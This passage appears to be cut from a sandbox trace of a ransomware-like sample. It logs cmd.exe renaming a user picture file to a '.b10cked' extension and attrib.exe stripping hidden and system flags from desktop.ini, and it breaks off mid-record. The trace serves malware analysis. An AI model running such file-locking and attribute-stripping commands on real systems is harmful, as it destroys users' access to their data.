GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0192.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.783] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0192.784] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.784] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0192.784] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.784] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0192.784] GetEnvironmentStringsW () returned 0x460190* [0192.784] FreeEnvironmentStringsW (penv=0x460190) returned 1 [0192.784] GetEnvironmentStringsW () returned 0x460190* [0192.784] FreeEnvironmentStringsW (penv=0x460190) returned 1 [0192.784] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eaac | out: phkResult=0x26eaac*=0x40) returned 0x0 [0192.784] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0xb8, lpcbData=0x26eab0*=0x1000) returned 0x2 [0192.784] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.784] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x1000) returned 0x2 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x0, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x1000) returned 0x2 [0192.785] RegCloseKey (hKey=0x40) returned 0x0 [0192.785] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eaac | out: phkResult=0x26eaac*=0x40) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x1000) returned 0x2 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x1000) returned 0x2 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x0, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x9, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x9, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x9, lpcbData=0x26eab0*=0x1000) returned 0x2 [0192.785] RegCloseKey (hKey=0x40) returned 0x0 [0192.785] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639a [0192.785] srand (_Seed=0x5b88639a) [0192.785] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked\"" [0192.785] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked\"" [0192.785] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.785] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4618f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0192.786] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.786] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0192.786] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.786] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0192.786] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0192.786] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0192.786] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0192.786] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0192.786] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0192.786] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0192.786] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0192.786] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0192.786] GetEnvironmentStringsW () returned 0x4622e0* [0192.786] FreeEnvironmentStringsW (penv=0x4622e0) returned 1 [0192.786] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.786] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.786] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0192.786] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0192.786] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0192.786] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0192.786] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0192.786] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0192.786] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0192.786] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0192.787] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f878 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.787] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f878, lpFilePart=0x26f874 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f874*="Desktop") returned 0x18 [0192.787] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.787] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f5f4 | out: lpFindFileData=0x26f5f4) returned 0x460020 [0192.787] FindClose (in: hFindFile=0x460020 | out: hFindFile=0x460020) returned 1 [0192.787] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f5f4 | out: lpFindFileData=0x26f5f4) returned 0x460020 [0192.787] FindClose (in: hFindFile=0x460020 | out: hFindFile=0x460020) returned 1 [0192.787] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f5f4 | out: lpFindFileData=0x26f5f4) returned 0x460020 [0192.787] FindClose (in: hFindFile=0x460020 | out: hFindFile=0x460020) returned 1 [0192.787] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.787] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0192.787] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0192.787] GetEnvironmentStringsW () returned 0x462b00* [0192.788] FreeEnvironmentStringsW (penv=0x462b00) returned 1 [0192.788] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.788] GetConsoleOutputCP () returned 0x1b5 [0192.788] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.788] GetUserDefaultLCID () returned 0x409 [0192.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f9b8, cchData=128 | out: lpLCData="0") returned 2 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f9b8, cchData=128 | out: lpLCData="0") returned 2 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f9b8, cchData=128 | out: lpLCData="1") returned 2 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0192.789] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0192.790] GetConsoleTitleW (in: lpConsoleTitle=0x4508e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.790] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.790] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0192.790] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0192.790] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0192.791] _wcsicmp (_String1="move", _String2=")") returned 68 [0192.791] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0192.791] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0192.791] _wcsicmp (_String1="IF", _String2="move") returned -4 [0192.791] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0192.791] _wcsicmp (_String1="REM", _String2="move") returned 5 [0192.791] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0192.793] GetConsoleTitleW (in: lpConsoleTitle=0x26f6b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.793] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0192.794] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0192.794] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0192.794] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0192.794] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0192.794] _wcsicmp (_String1="move", _String2="CD") returned 10 [0192.794] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0192.794] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0192.794] _wcsicmp (_String1="move", _String2="REN") returned -5 [0192.903] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0192.903] _wcsicmp (_String1="move", _String2="SET") returned -6 [0192.903] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0192.903] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0192.903] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0192.903] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0192.903] _wcsicmp (_String1="move", _String2="MD") returned 11 [0192.903] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0192.903] _wcsicmp (_String1="move", _String2="RD") returned -5 [0192.903] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0192.909] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0192.909] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0192.909] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0192.909] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0192.909] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0192.909] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0192.909] _wcsicmp (_String1="move", _String2="VER") returned -9 [0192.909] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0192.909] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0192.909] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0192.909] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0192.909] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0192.909] _wcsicmp (_String1="move", _String2="START") returned -6 [0192.909] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0192.909] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0192.910] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0192.911] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0192.911] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0192.911] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f46c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f464, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f464*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0192.913] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0192.913] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0192.913] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0192.913] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0192.913] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0192.913] _wcsicmp (_String1="guest.bmp", _String2=".") returned 57 [0192.913] _wcsicmp (_String1="guest.bmp", _String2="..") returned 57 [0192.913] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\guest.bmp")) returned 0x20 [0192.913] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x461e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.913] SetErrorMode (uMode=0x0) returned 0x0 [0192.913] SetErrorMode (uMode=0x1) returned 0x0 [0192.913] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", nBufferLength=0x104, lpBuffer=0x26edf4, lpFilePart=0x26eddc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", lpFilePart=0x26eddc*="guest.bmp") returned 0x2d [0192.913] SetErrorMode (uMode=0x0) returned 0x1 [0192.913] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1")) returned 0x2010 [0192.914] _wcsicmp (_String1="guest.bmp", _String2=".") returned 57 [0192.914] _wcsicmp (_String1="guest.bmp", _String2="..") returned 57 [0192.914] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\guest.bmp")) returned 0x20 [0192.914] SetErrorMode (uMode=0x0) returned 0x0 [0192.914] SetErrorMode (uMode=0x1) returned 0x0 [0192.914] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", nBufferLength=0x104, lpBuffer=0x26f270, lpFilePart=0x26f008 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", lpFilePart=0x26f008*="guest.bmp") returned 0x2d [0192.914] SetErrorMode (uMode=0x0) returned 0x1 [0192.914] SetErrorMode (uMode=0x0) returned 0x0 [0192.914] SetErrorMode (uMode=0x1) returned 0x0 [0192.914] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x26f478, lpFilePart=0x26f008 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked", lpFilePart=0x26f008*="guest.bmp.b10cked") returned 0x35 [0192.914] SetErrorMode (uMode=0x0) returned 0x1 [0192.914] SetLastError (dwErrCode=0x0) [0192.914] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\guest.bmp.b10cked")) returned 0xffffffff [0192.914] GetLastError () returned 0x2 [0192.914] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", fInfoLevelId=0x1, lpFindFileData=0x26e984, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e984) returned 0x450e88 [0192.914] FindNextFileW (in: hFindFile=0x450e88, lpFindFileData=0x26e984 | out: lpFindFileData=0x26e984) returned 0 [0192.915] GetLastError () returned 0x12 [0192.915] FindClose (in: hFindFile=0x450e88 | out: hFindFile=0x450e88) returned 1 [0192.916] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", fInfoLevelId=0x1, lpFindFileData=0x461bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x461bf0) returned 0x450e88 [0192.916] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x26ec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked", lpFilePart=0x0) returned 0x35 [0192.916] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", nBufferLength=0x104, lpBuffer=0x26ec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", lpFilePart=0x0) returned 0x2d [0192.916] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\guest.bmp")) returned 0x20 [0192.916] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\guest.bmp"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\guest.bmp.b10cked"), dwFlags=0x3) returned 1 [0192.917] FindClose (in: hFindFile=0x450e88 | out: hFindFile=0x450e88) returned 1 [0192.917] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ebd0 | out: _Buffer=" 1") returned 9 [0192.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.917] GetFileType (hFile=0x7) returned 0x2 [0192.917] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.917] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26eb5c | out: lpMode=0x26eb5c) returned 1 [0192.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.917] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26eb90 | out: lpConsoleScreenBufferInfo=0x26eb90) returned 1 [0192.917] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0192.918] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ebd0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0192.918] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26ebb4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ebb4*=0x1a) returned 1 [0192.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.918] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0192.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.918] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0192.918] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.918] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0192.918] SetConsoleInputExeNameW () returned 0x1 [0192.918] GetConsoleOutputCP () returned 0x1b5 [0192.918] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.918] SetThreadUILanguage (LangId=0x0) returned 0x409 [0192.918] exit (_Code=0) Process: id = "438" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e60" os_pid = "0xea0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "436" os_parent_pid = "0xa84" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT 